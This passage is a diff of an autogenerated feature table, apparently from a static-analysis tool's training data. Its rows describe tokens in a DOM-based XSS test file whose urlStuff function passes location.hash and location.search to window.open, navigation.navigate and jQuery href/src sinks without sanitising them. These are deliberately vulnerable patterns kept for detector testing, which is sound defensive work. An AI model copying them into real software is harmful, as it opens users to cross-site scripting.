substr 1 | | autogenerated/Xss/DomBasedXss/tst.js:486:37:486:42 | "body" | enclosingFunctionName | urlStuff | | autogenerated/Xss/DomBasedXss/tst.js:486:37:486:42 | "body" | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:489:3:489:8 | window | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:489:3:489:8 | window | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:489:3:489:8 | window | enclosingFunctionBody | url document location search substr 1 $ href url appendTo body $ #foo attr href url $ #foo attr href url $ src url appendTo body $ href win location href appendTo body $ src http://google.com/ url appendTo body $ src http://google.com url join / appendTo body url startsWith https:// $ src url appendTo body $ src url appendTo body window open location hash substr 1 navigation navigate location hash substr 1 | +| autogenerated/Xss/DomBasedXss/tst.js:489:3:489:8 | window | enclosingFunctionName | urlStuff | +| autogenerated/Xss/DomBasedXss/tst.js:489:3:489:8 | window | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:489:3:489:13 | window.open | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:489:3:489:13 | window.open | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:489:3:489:13 | window.open | enclosingFunctionBody | url document location search substr 1 $ href url appendTo body $ #foo attr href url $ #foo attr href url $ src url appendTo body $ href win location href appendTo body $ src http://google.com/ url appendTo body $ src http://google.com url join / appendTo body url startsWith https:// $ src url appendTo body $ src url appendTo body window open location hash substr 1 navigation navigate location hash substr 1 | +| autogenerated/Xss/DomBasedXss/tst.js:489:3:489:13 | window.open | enclosingFunctionName | urlStuff | +| autogenerated/Xss/DomBasedXss/tst.js:489:3:489:13 | window.open | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:489:3:489:38 | exceptional return of window. ... str(1)) | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:489:3:489:38 | exceptional return of window. ... str(1)) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:489:3:489:38 | exceptional return of window. ... str(1)) | enclosingFunctionBody | url document location search substr 1 $ href url appendTo body $ #foo attr href url $ #foo attr href url $ src url appendTo body $ href win location href appendTo body $ src http://google.com/ url appendTo body $ src http://google.com url join / appendTo body url startsWith https:// $ src url appendTo body $ src url appendTo body window open location hash substr 1 navigation navigate location hash substr 1 | +| autogenerated/Xss/DomBasedXss/tst.js:489:3:489:38 | exceptional return of window. ... str(1)) | enclosingFunctionName | urlStuff | +| autogenerated/Xss/DomBasedXss/tst.js:489:3:489:38 | exceptional return of window. ... str(1)) | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:489:3:489:38 | window. ... str(1)) | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:489:3:489:38 | window. ... str(1)) | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:489:3:489:38 | window. ... str(1)) | enclosingFunctionBody | url document location search substr 1 $ href url appendTo body $ #foo attr href url $ #foo attr href url $ src url appendTo body $ href win location href appendTo body $ src http://google.com/ url appendTo body $ src http://google.com url join / appendTo body url startsWith https:// $ src url appendTo body $ src url appendTo body window open location hash substr 1 navigation navigate location hash substr 1 | +| autogenerated/Xss/DomBasedXss/tst.js:489:3:489:38 | window. ... str(1)) | enclosingFunctionName | urlStuff | +| autogenerated/Xss/DomBasedXss/tst.js:489:3:489:38 | window. ... str(1)) | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:489:10:489:13 | open | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:489:10:489:13 | open | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:489:10:489:13 | open | enclosingFunctionBody | url document location search substr 1 $ href url appendTo body $ #foo attr href url $ #foo attr href url $ src url appendTo body $ href win location href appendTo body $ src http://google.com/ url appendTo body $ src http://google.com url join / appendTo body url startsWith https:// $ src url appendTo body $ src url appendTo body window open location hash substr 1 navigation navigate location hash substr 1 | +| autogenerated/Xss/DomBasedXss/tst.js:489:10:489:13 | open | enclosingFunctionName | urlStuff | +| autogenerated/Xss/DomBasedXss/tst.js:489:10:489:13 | open | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:489:15:489:22 | location | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:489:15:489:22 | location | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:489:15:489:22 | location | enclosingFunctionBody | url document location search substr 1 $ href url appendTo body $ #foo attr href url $ #foo attr href url $ src url appendTo body $ href win location href appendTo body $ src http://google.com/ url appendTo body $ src http://google.com url join / appendTo body url startsWith https:// $ src url appendTo body $ src url appendTo body window open location hash substr 1 navigation navigate location hash substr 1 | +| autogenerated/Xss/DomBasedXss/tst.js:489:15:489:22 | location | enclosingFunctionName | urlStuff | +| autogenerated/Xss/DomBasedXss/tst.js:489:15:489:22 | location | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:489:15:489:27 | location.hash | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:489:15:489:27 | location.hash | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:489:15:489:27 | location.hash | enclosingFunctionBody | url document location search substr 1 $ href url appendTo body $ #foo attr href url $ #foo attr href url $ src url appendTo body $ href win location href appendTo body $ src http://google.com/ url appendTo body $ src http://google.com url join / appendTo body url startsWith https:// $ src url appendTo body $ src url appendTo body window open location hash substr 1 navigation navigate location hash substr 1 | +| autogenerated/Xss/DomBasedXss/tst.js:489:15:489:27 | location.hash | enclosingFunctionName | urlStuff | +| autogenerated/Xss/DomBasedXss/tst.js:489:15:489:27 | location.hash | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:489:15:489:34 | location.hash.substr | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:489:15:489:34 | location.hash.substr | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:489:15:489:34 | location.hash.substr | enclosingFunctionBody | url document location search substr 1 $ href url appendTo body $ #foo attr href url $ #foo attr href url $ src url appendTo body $ href win location href appendTo body $ src http://google.com/ url appendTo body $ src http://google.com url join / appendTo body url startsWith https:// $ src url appendTo body $ src url appendTo body window open location hash substr 1 navigation navigate location hash substr 1 | +| autogenerated/Xss/DomBasedXss/tst.js:489:15:489:34 | location.hash.substr | enclosingFunctionName | urlStuff | +| autogenerated/Xss/DomBasedXss/tst.js:489:15:489:34 | location.hash.substr | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:489:15:489:37 | exceptional return of locatio ... bstr(1) | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:489:15:489:37 | exceptional return of locatio ... bstr(1) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:489:15:489:37 | exceptional return of locatio ... bstr(1) | enclosingFunctionBody | url document location search substr 1 $ href url appendTo body $ #foo attr href url $ #foo attr href url $ src url appendTo body $ href win location href appendTo body $ src http://google.com/ url appendTo body $ src http://google.com url join / appendTo body url startsWith https:// $ src url appendTo body $ src url appendTo body window open location hash substr 1 navigation navigate location hash substr 1 | +| autogenerated/Xss/DomBasedXss/tst.js:489:15:489:37 | exceptional return of locatio ... bstr(1) | enclosingFunctionName | urlStuff | +| autogenerated/Xss/DomBasedXss/tst.js:489:15:489:37 | exceptional return of locatio ... bstr(1) | fileImports | ansi-to-html | | autogenerated/Xss/DomBasedXss/tst.js:489:15:489:37 | locatio ... bstr(1) | CalleeFlexibleAccessPath | window.open | | autogenerated/Xss/DomBasedXss/tst.js:489:15:489:37 | locatio ... bstr(1) | InputArgumentIndex | 0 | | autogenerated/Xss/DomBasedXss/tst.js:489:15:489:37 | locatio ... bstr(1) | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | @@ -18062,6 +124388,16 @@ tokenFeatures | autogenerated/Xss/DomBasedXss/tst.js:489:15:489:37 | locatio ... bstr(1) | enclosingFunctionName | urlStuff | | autogenerated/Xss/DomBasedXss/tst.js:489:15:489:37 | locatio ... bstr(1) | fileImports | ansi-to-html | | autogenerated/Xss/DomBasedXss/tst.js:489:15:489:37 | locatio ... bstr(1) | receiverName | window | +| autogenerated/Xss/DomBasedXss/tst.js:489:24:489:27 | hash | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:489:24:489:27 | hash | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:489:24:489:27 | hash | enclosingFunctionBody | url document location search substr 1 $ href url appendTo body $ #foo attr href url $ #foo attr href url $ src url appendTo body $ href win location href appendTo body $ src http://google.com/ url appendTo body $ src http://google.com url join / appendTo body url startsWith https:// $ src url appendTo body $ src url appendTo body window open location hash substr 1 navigation navigate location hash substr 1 | +| autogenerated/Xss/DomBasedXss/tst.js:489:24:489:27 | hash | enclosingFunctionName | urlStuff | +| autogenerated/Xss/DomBasedXss/tst.js:489:24:489:27 | hash | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:489:29:489:34 | substr | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:489:29:489:34 | substr | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:489:29:489:34 | substr | enclosingFunctionBody | url document location search substr 1 $ href url appendTo body $ #foo attr href url $ #foo attr href url $ src url appendTo body $ href win location href appendTo body $ src http://google.com/ url appendTo body $ src http://google.com url join / appendTo body url startsWith https:// $ src url appendTo body $ src url appendTo body window open location hash substr 1 navigation navigate location hash substr 1 | +| autogenerated/Xss/DomBasedXss/tst.js:489:29:489:34 | substr | enclosingFunctionName | urlStuff | +| autogenerated/Xss/DomBasedXss/tst.js:489:29:489:34 | substr | fileImports | ansi-to-html | | autogenerated/Xss/DomBasedXss/tst.js:489:36:489:36 | 1 | CalleeFlexibleAccessPath | location.hash.substr | | autogenerated/Xss/DomBasedXss/tst.js:489:36:489:36 | 1 | InputArgumentIndex | 0 | | autogenerated/Xss/DomBasedXss/tst.js:489:36:489:36 | 1 | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | @@ -18069,6 +124405,51 @@ tokenFeatures | autogenerated/Xss/DomBasedXss/tst.js:489:36:489:36 | 1 | enclosingFunctionBody | url document location search substr 1 $ href url appendTo body $ #foo attr href url $ #foo attr href url $ src url appendTo body $ href win location href appendTo body $ src http://google.com/ url appendTo body $ src http://google.com url join / appendTo body url startsWith https:// $ src url appendTo body $ src url appendTo body window open location hash substr 1 navigation navigate location hash substr 1 | | autogenerated/Xss/DomBasedXss/tst.js:489:36:489:36 | 1 | enclosingFunctionName | urlStuff | | autogenerated/Xss/DomBasedXss/tst.js:489:36:489:36 | 1 | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:491:3:491:12 | navigation | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:491:3:491:12 | navigation | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:491:3:491:12 | navigation | enclosingFunctionBody | url document location search substr 1 $ href url appendTo body $ #foo attr href url $ #foo attr href url $ src url appendTo body $ href win location href appendTo body $ src http://google.com/ url appendTo body $ src http://google.com url join / appendTo body url startsWith https:// $ src url appendTo body $ src url appendTo body window open location hash substr 1 navigation navigate location hash substr 1 | +| autogenerated/Xss/DomBasedXss/tst.js:491:3:491:12 | navigation | enclosingFunctionName | urlStuff | +| autogenerated/Xss/DomBasedXss/tst.js:491:3:491:12 | navigation | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:491:3:491:21 | navigation.navigate | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:491:3:491:21 | navigation.navigate | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:491:3:491:21 | navigation.navigate | enclosingFunctionBody | url document location search substr 1 $ href url appendTo body $ #foo attr href url $ #foo attr href url $ src url appendTo body $ href win location href appendTo body $ src http://google.com/ url appendTo body $ src http://google.com url join / appendTo body url startsWith https:// $ src url appendTo body $ src url appendTo body window open location hash substr 1 navigation navigate location hash substr 1 | +| autogenerated/Xss/DomBasedXss/tst.js:491:3:491:21 | navigation.navigate | enclosingFunctionName | urlStuff | +| autogenerated/Xss/DomBasedXss/tst.js:491:3:491:21 | navigation.navigate | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:491:3:491:46 | exceptional return of navigat ... str(1)) | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:491:3:491:46 | exceptional return of navigat ... str(1)) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:491:3:491:46 | exceptional return of navigat ... str(1)) | enclosingFunctionBody | url document location search substr 1 $ href url appendTo body $ #foo attr href url $ #foo attr href url $ src url appendTo body $ href win location href appendTo body $ src http://google.com/ url appendTo body $ src http://google.com url join / appendTo body url startsWith https:// $ src url appendTo body $ src url appendTo body window open location hash substr 1 navigation navigate location hash substr 1 | +| autogenerated/Xss/DomBasedXss/tst.js:491:3:491:46 | exceptional return of navigat ... str(1)) | enclosingFunctionName | urlStuff | +| autogenerated/Xss/DomBasedXss/tst.js:491:3:491:46 | exceptional return of navigat ... str(1)) | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:491:3:491:46 | navigat ... str(1)) | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:491:3:491:46 | navigat ... str(1)) | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:491:3:491:46 | navigat ... str(1)) | enclosingFunctionBody | url document location search substr 1 $ href url appendTo body $ #foo attr href url $ #foo attr href url $ src url appendTo body $ href win location href appendTo body $ src http://google.com/ url appendTo body $ src http://google.com url join / appendTo body url startsWith https:// $ src url appendTo body $ src url appendTo body window open location hash substr 1 navigation navigate location hash substr 1 | +| autogenerated/Xss/DomBasedXss/tst.js:491:3:491:46 | navigat ... str(1)) | enclosingFunctionName | urlStuff | +| autogenerated/Xss/DomBasedXss/tst.js:491:3:491:46 | navigat ... str(1)) | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:491:14:491:21 | navigate | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:491:14:491:21 | navigate | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:491:14:491:21 | navigate | enclosingFunctionBody | url document location search substr 1 $ href url appendTo body $ #foo attr href url $ #foo attr href url $ src url appendTo body $ href win location href appendTo body $ src http://google.com/ url appendTo body $ src http://google.com url join / appendTo body url startsWith https:// $ src url appendTo body $ src url appendTo body window open location hash substr 1 navigation navigate location hash substr 1 | +| autogenerated/Xss/DomBasedXss/tst.js:491:14:491:21 | navigate | enclosingFunctionName | urlStuff | +| autogenerated/Xss/DomBasedXss/tst.js:491:14:491:21 | navigate | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:491:23:491:30 | location | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:491:23:491:30 | location | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:491:23:491:30 | location | enclosingFunctionBody | url document location search substr 1 $ href url appendTo body $ #foo attr href url $ #foo attr href url $ src url appendTo body $ href win location href appendTo body $ src http://google.com/ url appendTo body $ src http://google.com url join / appendTo body url startsWith https:// $ src url appendTo body $ src url appendTo body window open location hash substr 1 navigation navigate location hash substr 1 | +| autogenerated/Xss/DomBasedXss/tst.js:491:23:491:30 | location | enclosingFunctionName | urlStuff | +| autogenerated/Xss/DomBasedXss/tst.js:491:23:491:30 | location | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:491:23:491:35 | location.hash | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, 